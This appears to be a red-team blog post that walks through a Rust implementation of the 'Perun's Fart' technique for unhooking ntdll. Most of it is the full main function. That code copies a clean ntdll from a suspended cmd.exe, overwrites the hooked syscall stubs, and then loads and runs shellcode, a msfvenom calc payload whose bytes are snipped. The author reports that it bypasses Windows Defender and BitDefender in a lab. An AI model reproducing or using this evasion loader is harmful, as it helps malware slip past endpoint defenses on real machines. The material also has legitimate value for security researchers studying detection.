I've recently continued to explore the capabilities of Rust, and I decided to take on a challenge: implement Perun's Fart in Rust. Though this is not a novel technique, its implementation in Rust brings a new capability to the offensive toolset.
If you're not familiar with Perun's Fart, the methodology goes like this:
Execute implant.exe -> CreateProcess (Suspended) -> steal unhooked ntdll.dll from suspended process -> overwrite hooked syscall table in the memory of implant.exe -> execute malicious code
This technique is powerful because it lets us unhook our implant without an overly large PE file like the byoDLL technique, and does not require access to the copy of ntdll on disk. This technique is fairly well documented in other languages, but without further ado lets look at the implementation in Rust.
Part Two: The Code
The code is fairly lengthy and can be found in its in entirety on my Github, but the main function is below for your easy reference. It should be fairly straight forward to associate the code below with the methodology outlines above.
fnmain() {letmut garbage =String::from("\0");letmut attrsize:usize=Default::default();letmut old_protect = PAGE_EXECUTE_READ;let pDosHdr:*const IMAGE_DOS_HEADER;let pNtHdr:*const IMAGE_NT_HEADERS64;let pOptHdr: IMAGE_OPTIONAL_HEADER64;unsafe{let sacrificialProcess =b"cmd.exe\0";let initProcess =b"C:\\Windows\\System32\0";letmut pi:PROCESS_INFORMATION = mem::zeroed();letmut si:STARTUPINFOEXA = mem::zeroed(); si.lpAttributeList = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, attrsize) as LPPROC_THREAD_ATTRIBUTE_LIST;
si.StartupInfo.cb = mem::size_of::<STARTUPINFOA>() asu32;InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &mut attrsize);//create sacrificial processCreateProcessA(0as*constu8, sacrificialProcess.as_ptr() as*mutu8,0as*const SECURITY_ATTRIBUTES,0as*const SECURITY_ATTRIBUTES,falseasi32, CREATE_NEW_CONSOLE | CREATE_SUSPENDED,0as*const c_void, initProcess as*constu8,&mut si.StartupInfo,&mut pi );//get base addr of ntdll in memorylet pNtdllAddr =GetModuleBaseAddr("ntdll.dll");//map ntdll pDosHdr = pNtdllAddr as*mut IMAGE_DOS_HEADER; pNtHdr = (pNtdllAddr asu64+ (*pDosHdr).e_lfanew asu64) as*mut IMAGE_NT_HEADERS64; pOptHdr = (*pNtHdr).OptionalHeader;//find first image section let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
let target_section = [46, 116, 101, 120, 116, 0, 0, 0]; //.text//find text section of ntdll in memory let mut ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64)) as * const IMAGE_SECTION_HEADER;
for n in0..((*pNtHdr).FileHeader.NumberOfSectionsasu64){ ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64 * n)) as * const IMAGE_SECTION_HEADER;
if (*ntdll_addr).Name== target_section{ break; } }let ntdll_size = pOptHdr.SizeOfImageasusize;//create cachelet pCache =VirtualAlloc(0as*const c_void, ntdll_size, MEM_COMMIT, PAGE_READWRITE);//read sacrificial process ntdll.dlllet bytesRead =0as*mutusize;ReadProcessMemory( pi.hProcess, pNtdllAddr as*mut c_void, pCache, ntdll_size, bytesRead );println!("pCache: {:?}", pCache);println!("pCache size: {:?}", ntdll_size);stdin().read_line(&mut garbage).ok();//kill sacrificial processTerminateProcess(pi.hProcess, 0);println!("\nRemove hooks?\n");stdin().read_line(&mut garbage).ok();//unhook ntdll.dllUnhook(ntdll_addr as*mut c_void, pCache as*const c_void);VirtualFree(pCache,0,MEM_RELEASE);println!("Unhooking complete, run payload?");stdin().read_line(&mut garbage).ok(); }//msfvenom calclet payload : [u8;276] = […snip…];unsafe{//println!("allocating payload mem");//allocate payload memlet payload_addr =VirtualAlloc(0as*const c_void, payload.len(), MEM_COMMIT, PAGE_READWRITE);//println!("copying payload into mem");//copy payload std::ptr::copy(payload.as_ptr() as _, payload_addr, payload.len());//println!("restoring payload mem permissions");//change payload permissionsVirtualProtect( (payload_addr) as*const c_void, payload.len(), PAGE_EXECUTE_READ,&mut old_protect );//println!("creating thread");let thread_fn = std::mem::transmute (payload_addr as*constu32);//create thread//thread_fn();let thread =CreateThread(null_mut(),0, thread_fn, null_mut(), 0, null_mut());WaitForSingleObject(thread, u32::MAX); }}
Part Three: Differences
In terms of programmatic logic, there are no significant differences between the Rust implementation and implementations of this method in C, C++, or C#. However, due to the tight type control that Rust places on variables, there are significantly more type conversions in the code above than I'm personally used to seeing.
Additionally, at the time of writing, the windows_sys API's ability to parse the PE headers is not as robust or as well documented as it is in other languages. For example, in the code above it was necessary to manually add the size of the signature block into the traversal:
Rust Code:
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
It might be possible to re-type a variable using the IMAGE_SECTION_HEADER0 type in windows-sys API, but the limited documentation on this mechanic made the solution above more viable at the time of writing.
This issue, combined with my limited understanding of Rust's memory mechanics, made it difficult to implement the memory manipulations in the fluid manner that I initially expected.
For example, in the FindFirstSyscallFunction used to locate the first bytes of the syscall table we search for the bytes in the following manner:
for n in0..(memSize-3) asu64{if*((memAddr asu64+n) as PSTR) == pattern1[0]{if*((memAddr asu64+n+1) as PSTR) == pattern1[1]{if*((memAddr asu64+n+2) as PSTR) == pattern1[2]{ offset = n;break; } } } }
This clumsy approach was the only manner in which I was able to retain the types necessary to conduct an adequate byte comparison. There is definitely a more idiomatic approach to solving this problem, and I welcome you to implement a better solution.
Part Four: ???
[Intentionally left blank]
Part Five: Profit
Upon compiling and executing the code in our target environment, we're able to validate that our approach works as designed. Even better, we can use a standard msfvenom calc payload without any modifications inside of our executable and still bypass detection by Windows Defender and BitDefender in the lab environment.
Hooked NtCreateThread
Unhooked NtCreateThread
Payload execution:
Part Six: Conclusion
In this writeup, we saw an overview of a Rust implementation of the Perun's Fart unhooking technique. We were able to successfully unhook our copy of ntdll in memory and then go on to execute our payload thereby validating the stability of our approach.
We also saw how Rust requires a significantly more deliberate approach to variable types and memory manipulations than other languages, and some of the issues that this can cause for developers migrating to Rust.
Overall, the language is definitely viable for malware development and remains less detectable than similar C++ or C implementations of the same program. Personally, I will continue to explore the capabilities of Rust, but C and C++ will continue to be my primary development languages.
A special thanks to @0x4d5a for the help in developing the code discussed in this writeup. They have a solid set of offensive coding courses availible at: https://redteamsorcery.teachable.com/